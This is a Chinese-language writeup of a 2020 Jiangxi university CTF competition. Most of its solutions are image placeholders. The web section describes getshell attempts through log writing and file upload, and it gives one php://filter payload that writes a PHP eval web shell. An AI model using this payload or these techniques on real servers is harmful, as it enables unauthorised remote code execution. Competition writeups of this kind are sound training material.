2020年江西省大学生信息安全技术大赛Writeup
一、WEB
0x01 web1-找色差嘛
题解1-官方
文章图片
文章图片
文章图片
文章图片
题解2-江西软件职业技术大学 burpsuite 抓包直接改传参,返回包里面存有flag
0x02 web2
这道题好像是官方配置有问题,在一个容器里面有多个漏洞环境,很容易getshell,但是找不到flag,官方最后换了题
题解1-无
0x03 web3-Easy_console
题解1-官方
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
题解2-江西软件职业技术大学 这题试了挺多方法的
文章图片
慢日志写shell 失败
文章图片
写日志getshell 失败
文章图片
最后在文件上传位置上传getshell
无字母一句话getshell
0x04 web4-Ezexit
题解1-官方
文章图片
题解2-江西软件职业技术大学 https://xz.aliyun.com/t/7457
文章图片
文章图片
文章图片
文章图片
文章图片
path=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../h.php
二、MISC Different_P
文章图片
文章图片
文章图片
奇怪的杂项
文章图片
文章图片
文章图片
神秘文件
文章图片
文章图片
文章图片
文章图片
newbie_rsa
文章图片
文章图片
文章图片
文章图片
三、REVERSE ReMe
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
findme
文章图片
文章图片
文章图片
文章图片
文章图片
四、PWN easy_rop
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
Summeron
文章图片
文章图片
文章图片
文章图片
五、CRYPTO babyCrypto
文章图片
文章图片
文章图片
文章图片
港独密报
文章图片
文章图片
文章图片
文章图片
文章图片
文章图片
【CTF|2020年江西省大学生信息安全技术大赛Writeup】
文章图片
推荐阅读
- 渗透测试|web渗透学习目录-新手打开思路
- 安全漏洞|vulhub漏洞复现系列之appweb认证绕过漏洞(CVE-2018-8715)
- Ethernaut靶场通关记录|以太Ethernaut靶场打靶—0 Hello Ethernaut
- 安全|ISCC-WP
- 信息安全|网络安全常用术语
- 渗透蓝队|蓝队应急响应之Windows篇
- 科技|网络安全与Kali(Sqlmap数据库注入实战)
- [信息安全] WEP 是什么
- 信息安全|聊聊猎洞的残酷真相(一腔孤勇,为爱发电)